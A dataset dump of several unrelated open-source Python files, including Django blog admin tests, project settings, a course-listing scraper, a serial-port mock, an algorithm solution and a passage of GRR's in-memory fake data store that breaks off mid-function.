id (stringlengths 1-7) | text (stringlengths 6-1.03M) | dataset_id (stringclasses, 1 value) |
---|---|---|
1690712
|
<filename>tests/domain/test_Track_group.py
import pytest
from tloen.domain import Application, Track
@pytest.mark.asyncio
async def test_1():
track_a = Track()
track_b = Track()
group_track = await Track.group([track_a, track_b])
assert isinstance(group_track, Track)
assert list(group_track.tracks) == [track_a, track_b]
assert group_track.application is track_a.application
assert group_track.channel_count is None
assert group_track.name is None
assert group_track.parent is None
assert group_track.provider is track_a.provider
assert not group_track.is_cued
assert not group_track.is_muted
assert not group_track.is_soloed
assert track_a.parent is group_track.tracks
assert track_b.parent is group_track.tracks
@pytest.mark.asyncio
async def test_2():
application = Application()
context = await application.add_context()
track_a = await context.add_track()
track_b = await context.add_track()
track_c = await context.add_track()
group_track = await Track.group([track_b, track_c])
assert list(context.tracks) == [track_a, group_track]
assert list(group_track.tracks) == [track_b, track_c]
assert group_track.application is application
assert group_track.parent is context.tracks
assert group_track.provider is context.provider
assert track_b.provider is context.provider
assert track_c.provider is context.provider
@pytest.mark.asyncio
async def test_3():
application = Application()
context = await application.add_context()
track_a = await context.add_track()
track_b = await context.add_track()
track_c = await context.add_track()
await application.boot()
group_track = await Track.group([track_b, track_c])
assert list(context.tracks) == [track_a, group_track]
assert list(group_track.tracks) == [track_b, track_c]
assert group_track.application is application
assert group_track.parent is context.tracks
assert group_track.provider is context.provider
assert track_b.provider is context.provider
assert track_c.provider is context.provider
|
StarcoderdataPython
|
3216377
|
<reponame>rowanv/django-blog-zinnia
# coding=utf-8
"""Test cases for Zinnia's admin"""
from __future__ import unicode_literals
from django.contrib.admin.sites import AdminSite
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.test import RequestFactory
from django.test import TestCase
from django.utils import timezone
from django.utils.translation import activate
from django.utils.translation import deactivate
from zinnia import settings
from zinnia.admin import entry as entry_admin
from zinnia.admin.category import CategoryAdmin
from zinnia.admin.entry import EntryAdmin
from zinnia.managers import PUBLISHED
from zinnia.models.author import Author
from zinnia.models.category import Category
from zinnia.models.entry import Entry
from zinnia.signals import disconnect_entry_signals
from zinnia.tests.utils import datetime
from zinnia.tests.utils import skip_if_custom_user
from zinnia.url_shortener.backends.default import base36
class BaseAdminTestCase(TestCase):
rich_urls = 'zinnia.tests.implementations.urls.default'
poor_urls = 'zinnia.tests.implementations.urls.poor'
model_class = None
admin_class = None
def setUp(self):
disconnect_entry_signals()
activate('en')
self.site = AdminSite()
self.admin = self.admin_class(
self.model_class, self.site)
def tearDown(self):
"""
Deactivate the translation system.
"""
deactivate()
def check_with_rich_and_poor_urls(self, func, args,
result_rich, result_poor):
with self.settings(ROOT_URLCONF=self.rich_urls):
self.assertEqual(func(*args), result_rich)
with self.settings(ROOT_URLCONF=self.poor_urls):
self.assertEqual(func(*args), result_poor)
class TestMessageBackend(object):
"""Message backend for testing"""
def __init__(self, *ka, **kw):
self.messages = []
def add(self, *ka, **kw):
self.messages.append(ka)
@skip_if_custom_user
class EntryAdminTestCase(BaseAdminTestCase):
"""Test case for Entry Admin"""
model_class = Entry
admin_class = EntryAdmin
def setUp(self):
super(EntryAdminTestCase, self).setUp()
params = {'title': 'My title',
'content': 'My content',
'slug': 'my-title'}
self.entry = Entry.objects.create(**params)
self.request_factory = RequestFactory()
self.request = self.request_factory.get('/')
def test_get_title(self):
self.assertEqual(self.admin.get_title(self.entry),
'My title (2 words)')
self.entry.comment_count = 1
self.entry.save()
self.entry = Entry.objects.get(pk=self.entry.pk)
self.assertEqual(self.admin.get_title(self.entry),
'My title (2 words) (1 reaction)')
self.entry.pingback_count = 1
self.entry.save()
self.entry = Entry.objects.get(pk=self.entry.pk)
self.assertEqual(self.admin.get_title(self.entry),
'My title (2 words) (2 reactions)')
def test_get_authors(self):
self.check_with_rich_and_poor_urls(
self.admin.get_authors, (self.entry,),
'', '')
author_1 = Author.objects.create_user(
'author-1', '<EMAIL>')
author_2 = Author.objects.create_user(
'author<2>', '<EMAIL>')
self.entry.authors.add(author_1)
self.check_with_rich_and_poor_urls(
self.admin.get_authors, (self.entry,),
'<a href="/authors/author-1/" target="blank">author-1</a>',
'author-1')
self.entry.authors.add(author_2)
self.check_with_rich_and_poor_urls(
self.admin.get_authors, (self.entry,),
'<a href="/authors/author-1/" target="blank">author-1</a>, '
'<a href="/authors/author%3C2%3E/" target="blank">'
'author<2></a>',
'author-1, author<2>')
def test_get_authors_non_ascii(self):
author = Author.objects.create_user(
'тест', '<EMAIL>')
self.entry.authors.add(author)
self.check_with_rich_and_poor_urls(
self.admin.get_authors, (self.entry,),
'<a href="/authors/%D1%82%D0%B5%D1%81%D1%82/" '
'target="blank">тест</a>',
'тест')
def test_get_categories(self):
self.check_with_rich_and_poor_urls(
self.admin.get_categories, (self.entry,),
'', '')
category_1 = Category.objects.create(title='Category <b>1</b>',
slug='category-1')
category_2 = Category.objects.create(title='Category <b>2</b>',
slug='category-2')
self.entry.categories.add(category_1)
self.check_with_rich_and_poor_urls(
self.admin.get_categories, (self.entry,),
'<a href="/categories/category-1/" target="blank">'
'Category <b>1</b></a>',
'Category <b>1</b>')
self.entry.categories.add(category_2)
self.check_with_rich_and_poor_urls(
self.admin.get_categories, (self.entry,),
'<a href="/categories/category-1/" target="blank">'
'Category <b>1</b></a>, '
'<a href="/categories/category-2/" target="blank">Category '
'<b>2</b></a>',
'Category <b>1</b>, Category <b>2</b>')
def test_get_categories_non_ascii(self):
category = Category.objects.create(title='Category тест',
slug='category')
self.entry.categories.add(category)
self.check_with_rich_and_poor_urls(
self.admin.get_categories, (self.entry,),
'<a href="/categories/category/" target="blank">'
'Category тест</a>',
'Category тест')
def test_get_tags(self):
self.check_with_rich_and_poor_urls(
self.admin.get_tags, (self.entry,),
'', '')
self.entry.tags = 'zinnia'
self.check_with_rich_and_poor_urls(
self.admin.get_tags, (self.entry,),
'<a href="/tags/zinnia/" target="blank">zinnia</a>',
'zinnia')
self.entry.tags = 'zinnia, t<e>st'
self.check_with_rich_and_poor_urls(
self.admin.get_tags, (self.entry,),
'<a href="/tags/t%3Ce%3Est/" target="blank">t<e>st</a>, '
'<a href="/tags/zinnia/" target="blank">zinnia</a>',
'zinnia, t<e>st') # Yes, this is not the same order...
def test_get_tags_non_ascii(self):
self.entry.tags = 'тест'
self.check_with_rich_and_poor_urls(
self.admin.get_tags, (self.entry,),
'<a href="/tags/%D1%82%D0%B5%D1%81%D1%82/" '
'target="blank">тест</a>',
'тест')
def test_get_sites(self):
self.assertEqual(self.admin.get_sites(self.entry), '')
self.entry.sites.add(Site.objects.get_current())
self.check_with_rich_and_poor_urls(
self.admin.get_sites, (self.entry,),
'<a href="http://example.com/" target="blank">example.com</a>',
'<a href="http://example.com" target="blank">example.com</a>')
def test_get_short_url(self):
with self.settings(ROOT_URLCONF=self.poor_urls):
entry_url = self.entry.get_absolute_url()
self.check_with_rich_and_poor_urls(
self.admin.get_short_url, (self.entry,),
'<a href="http://example.com/%(hash)s/" target="blank">'
'http://example.com/%(hash)s/</a>' % {
'hash': base36(self.entry.pk)},
'<a href="%(url)s" target="blank">%(url)s</a>' % {
'url': entry_url})
def test_get_is_visible(self):
self.assertEqual(self.admin.get_is_visible(self.entry),
self.entry.is_visible)
def test_queryset(self):
user = Author.objects.create_user(
'user', '<EMAIL>')
self.entry.authors.add(user)
root = Author.objects.create_superuser(
'root', '<EMAIL>', 'toor')
params = {'title': 'My root title',
'content': 'My root content',
'slug': 'my-root-titile'}
root_entry = Entry.objects.create(**params)
root_entry.authors.add(root)
self.request.user = User.objects.get(pk=user.pk)
self.assertEqual(len(self.admin.get_queryset(self.request)), 1)
self.request.user = User.objects.get(pk=root.pk)
self.assertEqual(len(self.admin.get_queryset(self.request)), 2)
def test_get_changeform_initial_data(self):
user = User.objects.create_user(
'user', '<EMAIL>')
site = Site.objects.get_current()
self.request.user = user
data = self.admin.get_changeform_initial_data(self.request)
self.assertEqual(data, {'authors': [user.pk],
'sites': [site.pk]})
request = self.request_factory.get('/?title=data')
request.user = user
data = self.admin.get_changeform_initial_data(request)
self.assertEqual(data, {'title': 'data'})
def test_formfield_for_manytomany(self):
staff = User.objects.create_user(
'staff', '<EMAIL>')
author = User.objects.create_user(
'author', '<EMAIL>')
root = User.objects.create_superuser(
'root', '<EMAIL>', 'toor')
self.request.user = root
field = self.admin.formfield_for_manytomany(
Entry.authors.field, self.request)
self.assertEqual(field.queryset.count(), 1)
staff.is_staff = True
staff.save()
field = self.admin.formfield_for_manytomany(
Entry.authors.field, self.request)
self.assertEqual(field.queryset.count(), 2)
self.entry.authors.add(Author.objects.get(pk=author.pk))
field = self.admin.formfield_for_manytomany(
Entry.authors.field, self.request)
self.assertEqual(field.queryset.count(), 3)
def test_get_readonly_fields(self):
user = User.objects.create_user(
'user', '<EMAIL>')
root = User.objects.create_superuser(
'root', '<EMAIL>', 'toor')
self.request.user = user
self.assertEqual(self.admin.get_readonly_fields(self.request),
['status', 'authors'])
self.request.user = root
self.assertEqual(self.admin.get_readonly_fields(self.request),
[])
def test_get_actions(self):
original_ping_directories = settings.PING_DIRECTORIES
user = User.objects.create_user(
'user', '<EMAIL>')
root = User.objects.create_superuser(
'root', '<EMAIL>', 'toor')
self.request.user = user
settings.PING_DIRECTORIES = True
self.assertEqual(
list(self.admin.get_actions(self.request).keys()),
['delete_selected',
'close_comments',
'close_pingbacks',
'close_trackbacks',
'ping_directories',
'put_on_top',
'mark_featured',
'unmark_featured'])
settings.PING_DIRECTORIES = False
self.assertEqual(
list(self.admin.get_actions(self.request).keys()),
['delete_selected',
'close_comments',
'close_pingbacks',
'close_trackbacks',
'put_on_top',
'mark_featured',
'unmark_featured'])
self.request.user = root
self.assertEqual(
list(self.admin.get_actions(self.request).keys()),
['delete_selected',
'make_mine',
'make_published',
'make_hidden',
'close_comments',
'close_pingbacks',
'close_trackbacks',
'put_on_top',
'mark_featured',
'unmark_featured'])
settings.PING_DIRECTORIES = original_ping_directories
def test_get_actions_in_popup_mode_issue_291(self):
user = User.objects.create_user(
'user', '<EMAIL>')
request = self.request_factory.get('/?_popup=1')
request.user = user
self.assertEqual(
list(self.admin.get_actions(request).keys()),
[])
def test_make_mine(self):
user = Author.objects.create_user(
'user', '<EMAIL>')
self.request.user = User.objects.get(pk=user.pk)
self.request._messages = TestMessageBackend()
self.assertEqual(user.entries.count(), 0)
self.admin.make_mine(self.request, Entry.objects.all())
self.assertEqual(user.entries.count(), 1)
self.assertEqual(len(self.request._messages.messages), 1)
def test_make_published(self):
original_ping_directories = settings.PING_DIRECTORIES
settings.PING_DIRECTORIES = []
self.request._messages = TestMessageBackend()
self.entry.sites.add(Site.objects.get_current())
self.assertEqual(Entry.published.count(), 0)
self.admin.make_published(self.request, Entry.objects.all())
self.assertEqual(Entry.published.count(), 1)
self.assertEqual(len(self.request._messages.messages), 1)
settings.PING_DIRECTORIES = original_ping_directories
def test_make_hidden(self):
self.request._messages = TestMessageBackend()
self.entry.status = PUBLISHED
self.entry.save()
self.entry.sites.add(Site.objects.get_current())
self.assertEqual(Entry.published.count(), 1)
self.admin.make_hidden(self.request, Entry.objects.all())
self.assertEqual(Entry.published.count(), 0)
self.assertEqual(len(self.request._messages.messages), 1)
def test_close_comments(self):
self.request._messages = TestMessageBackend()
self.assertEqual(Entry.objects.filter(
comment_enabled=True).count(), 1)
self.admin.close_comments(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(
comment_enabled=True).count(), 0)
self.assertEqual(len(self.request._messages.messages), 1)
def test_close_pingbacks(self):
self.request._messages = TestMessageBackend()
self.assertEqual(Entry.objects.filter(
pingback_enabled=True).count(), 1)
self.admin.close_pingbacks(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(
pingback_enabled=True).count(), 0)
self.assertEqual(len(self.request._messages.messages), 1)
def test_close_trackbacks(self):
self.request._messages = TestMessageBackend()
self.assertEqual(Entry.objects.filter(
trackback_enabled=True).count(), 1)
self.admin.close_trackbacks(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(
trackback_enabled=True).count(), 0)
self.assertEqual(len(self.request._messages.messages), 1)
def test_put_on_top(self):
original_ping_directories = settings.PING_DIRECTORIES
settings.PING_DIRECTORIES = []
self.request._messages = TestMessageBackend()
self.entry.publication_date = datetime(2011, 1, 1, 12, 0)
self.admin.put_on_top(self.request, Entry.objects.all())
self.assertEqual(
Entry.objects.get(pk=self.entry.pk).creation_date.date(),
timezone.now().date())
self.assertEqual(len(self.request._messages.messages), 1)
settings.PING_DIRECTORIES = original_ping_directories
def test_mark_unmark_featured(self):
self.request._messages = TestMessageBackend()
self.assertEqual(Entry.objects.filter(
featured=True).count(), 0)
self.admin.mark_featured(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(featured=True).count(), 1)
self.assertEqual(len(self.request._messages.messages), 1)
self.admin.unmark_featured(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(featured=True).count(), 0)
self.assertEqual(len(self.request._messages.messages), 2)
def test_ping_directories(self):
class FakePinger(object):
def __init__(self, *ka, **kw):
self.results = [{'flerror': False, 'message': 'OK'},
{'flerror': True, 'message': 'KO'}]
def join(self):
pass
original_pinger = entry_admin.DirectoryPinger
entry_admin.DirectoryPinger = FakePinger
original_ping_directories = settings.PING_DIRECTORIES
settings.PING_DIRECTORIES = ['http://ping.com/ping']
self.request._messages = TestMessageBackend()
self.admin.ping_directories(self.request, Entry.objects.all(), False)
self.assertEqual(len(self.request._messages.messages), 0)
self.admin.ping_directories(self.request, Entry.objects.all())
self.assertEqual(len(self.request._messages.messages), 2)
self.assertEqual(self.request._messages.messages,
[(20, 'http://ping.com/ping : KO', ''),
(20, 'http://ping.com/ping directory succesfully '
'pinged 1 entries.', '')])
entry_admin.DirectoryPinger = original_pinger
settings.PING_DIRECTORIES = original_ping_directories
class CategoryAdminTestCase(BaseAdminTestCase):
"""Test cases for Category Admin"""
model_class = Category
admin_class = CategoryAdmin
def test_get_tree_path(self):
category = Category.objects.create(title='Category', slug='cat')
self.check_with_rich_and_poor_urls(
self.admin.get_tree_path, (category,),
'<a href="/categories/cat/" target="blank">/cat/</a>',
'/cat/')
|
StarcoderdataPython
|
4840930
|
<gh_stars>1-10
'''
Given an array of integers nums and an integer k, return the total number of continuous subarrays whose sum equals to k.
Example 1:
Input: nums = [1,1,1], k = 2
Output: 2
Example 2:
Input: nums = [1,2,3], k = 3
Output: 2
Constraints:
1 <= nums.length <= 2 * 10^4
-1000 <= nums[i] <= 1000
-10^7 <= k <= 10^7
'''
from typing import List
class Solution:
def subarraySum(self, nums: List[int], k: int) -> int:
sumCount = {}
count = 0
sumValue = 0
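# Prefix-sum technique: for each position, count how many earlier prefix sums equal (current prefix sum - k);
# each such match corresponds to one contiguous subarray summing to k.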
for i in nums:
sumValue = sumValue+i
if sumValue == k:
count = count + 1
if (sumValue - k) in sumCount.keys():
count = count + sumCount[sumValue-k]
if sumValue in sumCount.keys():
sumCount[sumValue] = sumCount[sumValue] + 1
else:
sumCount[sumValue] = 1
return count
|
StarcoderdataPython
|
21207
|
import json
from PIL import Image
with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.7.json') as f:
val_1_7 = json.load(f)
with open('sl4_side_val_1.7/results.json') as f:
new_1_8 = json.load(f)
ROOT = '/home/tianpei.qian/workspace/data_local/sl4_front_1.0/'
for old, new in zip(val_1_7, new_1_8):
assert old['file'] == new['file']
im = Image.open(ROOT + old['file'])
im_width, im_height = im.size
for box in new['detections']:
new_box = {}
x_min, x_max, y_min, y_max = box['x_min'], box['x_max'], box['y_min'], box['y_max']
width, height = x_max - x_min, y_max - y_min
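# Convert the absolute corner box to normalized (center_x, center_y, width, height) relative to the image size.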
new_box['coord'] = [(x_min + x_max) / 2 / im_width, (y_min + y_max) / 2 / im_height, width / im_width, height / im_height]
new_box['meta'] = {'isfrontcar': False}
new_box['class'] = box['kind']
new_box['occluded'] = 'none'
new_box['score'] = box['score']
old['boxes'].append(new_box)
with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.8.json', 'w') as f:
json.dump(val_1_7, f)
|
StarcoderdataPython
|
3323920
|
<gh_stars>1-10
import requests
import csv
from time import time
baseURL = "https://sisu-api.apps.mec.gov.br/api/v1/oferta/"
filename = "all_courses"
t0 = time()
print("Will write to file '{}.csv'.".format(filename))
csvFile = open(filename + ".csv", "w+", encoding="UTF-8")
csvFileWriter = csv.writer(csvFile, delimiter=";", quotechar="\"", quoting=csv.QUOTE_ALL, lineterminator="\n")
response = requests.get(baseURL+"instituicoes").json()
instituicoes = [r["co_ies"] for r in response]
ofertas = []
for i, instituicao in enumerate(instituicoes):
print("[{:>3}/{}] Scanning ID #{}...".format(i+1, len(instituicoes), instituicao))
response = requests.get(baseURL+"instituicao/"+instituicao).json()
for i in range(len(response)-1):
r = response[str(i)]
codigo = r["co_oferta"]
cursoNome = r["no_curso"]
cursoGrau = r["no_grau"]
cursoTurno = r["no_turno"]
vagasTotais = r["qt_vagas_sem1"]
campusNome = r["no_campus"]
campusCidade = r["no_municipio_campus"]
campusUF = r["sg_uf_campus"]
iesNome = r["no_ies"]
iesSG = r["sg_ies"]
oferta = (campusUF, iesNome, iesSG, campusCidade, campusNome, cursoNome, cursoGrau, cursoTurno, vagasTotais, codigo)
ofertas.append(oferta)
ofertas = sorted(ofertas)
# Write to .csv
for oferta in ofertas:
csvFileWriter.writerow(tuple(oferta))
print("Written {} courses to '{}.csv' in {:.1f}s.".format(len(ofertas), filename, time()-t0))
|
StarcoderdataPython
|
1615469
|
import os
PROJECT_PATH = os.path.abspath(os.getcwd())
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('<NAME>', '<EMAIL>'),
('<NAME>', '<EMAIL>'),
)
MANAGERS = ADMINS
ALLOWED_HOSTS = [
'127.0.0.1',
]
TIME_ZONE = 'Europe/Istanbul'
LANGUAGE_CODE = 'tr-tr'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = '{:s}/static/'.format(PROJECT_PATH)
STATIC_URL = '/static/'
STATICFILES_DIRS = (
'{:s}/static_files/'.format(PROJECT_PATH),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
SECRET_KEY = '#1f*6@=e@*7t1yk_!gef=jn!pc5#mv_%)=8__y8*gi0&0t7=u('
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# 'djangospam.cookie.middleware.SpamCookieMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(PROJECT_PATH, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ROOT_URLCONF = 'pyist.urls'
WSGI_APPLICATION = 'pyist.wsgi.application'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.flatpages',
'django.contrib.sitemaps',
'django_gravatar',
'markitup',
'nose',
'people',
'presentations',
'blog',
)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# Database Settings
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '{:s}/data/db.sqlite'.format(PROJECT_PATH),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
# Markitup Settings
MARKITUP_SET = 'markitup/sets/markdown'
MARKITUP_FILTER = ('markdown.markdown', {'safe_mode': False})
# Blog Settings
BLOG = {
'TITLE': 'Python İstanbul',
'DESCRIPTION': 'Python İstanbul Günlüğü',
'LIMIT': 5,
'URL': 'http://pyistanbul.org/',
'DISQUS_USERNAME': 'pyistanbul',
'USE_DISQUS': False,
}
# Djangospam Settings
# DJANGOSPAM_COOKIE_KEY = 'argumentclinic'
# DJANGOSPAM_LOG = 'spam.log'
# Nose Settings
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
|
StarcoderdataPython
|
3379840
|
import math
def older(person):
print()
print('Person ', person, ' is older')
def main():
# compiling the bday for person 1
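# Each date is encoded as a comparable integer YYYYMMDD: year * 10**4 + month * 10**2 + day.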
print('please input birthday of 1st person')
p1_year = int(input('\tyear: ')) * math.pow(10, 4)
p1_month = 0
while p1_month > 12 or p1_month == 0:
p1_month = int(input('\tmonth: '))
p1_month *= math.pow(10,2)
p1_day = 0
while p1_day > 31 or p1_day ==0:
p1_day = int(input('\tday: '))
# compiling the bday for person 2
print('please input birthday of 2nd person')
p2_year = int(input('\tyear: ')) * math.pow(10,4)
p2_month = 0
while p2_month > 12 or p2_month == 0:
p2_month = int(input('\tmonth: '))
p2_month *= math.pow(10,2)
p2_day = 0
while p2_day > 31 or p2_day == 0:
p2_day = int(input('\tday: '))
# summing up each's birthday
p1_bday = p1_year + p1_month + p1_day
p2_bday = p2_year + p2_month + p2_day
if (p1_bday == p2_bday):
print('they have the same birthday')
elif (p1_bday < p2_bday):
older(1)
else:
older(2)
print()
while 1:
main()
|
StarcoderdataPython
|
6814
|
<reponame>sbarguil/Testing-framework<filename>AutomationFramework/tests/interfaces/test_if_subif.py
import pytest
from AutomationFramework.page_objects.interfaces.interfaces import Interfaces
from AutomationFramework.tests.base_test import BaseTest
class TestInterfacesSubInterfaces(BaseTest):
test_case_file = 'if_subif.yml'
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_description',
'page_object_class': Interfaces}])
def test_if_subif_description(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_enabled',
'page_object_class': Interfaces}])
def test_if_subif_enabled(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_prefix_length',
'page_object_class': Interfaces}])
def test_if_subif_ip_prefix_length(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_state',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_ip_state(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_origin',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_origin(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_dhcp_client',
'page_object_class': Interfaces}])
def test_if_subif_dhcp_client(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_mtu',
'page_object_class': Interfaces}])
def test_if_subif_mtu(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_inner_outer_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_inner_outer_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_match_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_match_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
|
StarcoderdataPython
|
3392633
|
<filename>pettygram/views.py
#django
from django.http import HttpResponse
#utilities
from datetime import datetime
import json
def hello_world(request):
return HttpResponse("oh, hi! , Current server time is {now}".format(
now= datetime.now().strftime('%b %dth, %y - %H:%M hrs')
))
def sorted_integers(request):
#return a json response with sorted integers
numbers = [int (i) for i in request.GET['numbers'].split(',')]
sorted_ints = sorted(numbers)
# data to be displayed
data = {
'status' : 'ok',
'numbers': sorted_ints,
'message': 'Integers sorted successfully'
}
return HttpResponse(
json.dumps(data),
content_type='application/json'
)
def say_hi(request, name, age):
""""Return a greeting"""
if age < 12:
message = 'Sorry {}, you are not allowed here'.format(name)
else:
message = 'Hello {}, welcome to pettygram'.format(name)
return HttpResponse(message)
|
StarcoderdataPython
|
120688
|
# Testing serial ports
# https://faradayrf.com/unit-testing-pyserial-code/
# Import modules
import serial
class SerialTestClass(object):
"""A mock serial port test class"""
def __init__(self):
"""Creates a mock serial port which is a loopback object"""
self.device = "test"
self._port = "loop://"
self._timeout = 0
self._baudrate = 115200
self.serialPort = \
serial.serial_for_url(url=self._port,
timeout=self._timeout,
baudrate=self._baudrate)
def __enter__(self, *args, **kwargs):
pass
def __exit__(self, *args, **kwargs):
pass
def open(self, *args, **kwargs):
pass
def close(self, *args, **kwargs):
pass
def read(self, command):
pass
def write(self, command):
pass
|
StarcoderdataPython
|
3343552
|
#!/usr/bin/env python
"""An implementation of an in-memory data store for testing."""
from __future__ import print_function
import sys
import threading
import time
from future.utils import iteritems
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_server import aff4
from grr_response_server import data_store
class FakeDBSubjectLock(data_store.DBSubjectLock):
"""A fake transaction object for testing."""
def _Acquire(self, lease_time):
self.expires = int((time.time() + lease_time) * 1e6)
with self.store.lock:
expires = self.store.transactions.get(self.subject)
if expires and (time.time() * 1e6) < expires:
raise data_store.DBSubjectLockError("Subject is locked")
self.store.transactions[self.subject] = self.expires
self.locked = True
def UpdateLease(self, duration):
self.expires = int((time.time() + duration) * 1e6)
self.store.transactions[self.subject] = self.expires
def Release(self):
with self.store.lock:
if self.locked:
self.store.transactions.pop(self.subject, None)
self.locked = False
class FakeDataStore(data_store.DataStore):
"""A fake data store - Everything is in memory."""
def __init__(self):
super(FakeDataStore, self).__init__()
self.subjects = {}
# All access to the store must hold this lock.
self.lock = threading.RLock()
# The set of all transactions in flight.
self.transactions = {}
self._value_converter = aff4.ValueConverter()
@utils.Synchronized
def DeleteSubject(self, subject, sync=False):
_ = sync
subject = utils.SmartUnicode(subject)
try:
del self.subjects[subject]
except KeyError:
pass
@utils.Synchronized
def ClearTestDB(self):
self.subjects = {}
def DBSubjectLock(self, subject, lease_time=None):
return FakeDBSubjectLock(self, subject, lease_time=lease_time)
@utils.Synchronized
def Set(self,
subject,
attribute,
value,
timestamp=None,
replace=True,
sync=True):
"""Set the value into the data store."""
subject = utils.SmartUnicode(subject)
_ = sync
attribute = utils.SmartUnicode(attribute)
if timestamp is None or timestamp == self.NEWEST_TIMESTAMP:
timestamp = time.time() * 1000000
if subject not in self.subjects:
self.subjects[subject] = {}
if replace or attribute not in self.subjects[subject]:
self.subjects[subject][attribute] = []
encoded_value = self._value_converter.Encode(attribute, value)
self.subjects[subject][attribute].append([encoded_value, int(timestamp)])
self.subjects[subject][attribute].sort(key=lambda x: x[1])
@utils.Synchronized
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
sync=True,
to_delete=None):
subject = utils.SmartUnicode(subject)
if to_delete:
self.DeleteAttributes(subject, to_delete, sync=sync)
for k, seq in iteritems(values):
for v in seq:
if isinstance(v, (list, tuple)):
v, element_timestamp = v
else:
element_timestamp = timestamp
self.Set(
subject,
k,
v,
timestamp=element_timestamp,
replace=replace,
sync=sync)
@utils.Synchronized
def DeleteAttributes(self,
subject,
attributes,
start=None,
end=None,
sync=None):
_ = sync # Unimplemented.
if isinstance(attributes, basestring):
raise ValueError(
"String passed to DeleteAttributes (non string iterable expected).")
subject = utils.SmartUnicode(subject)
try:
record = self.subjects[subject]
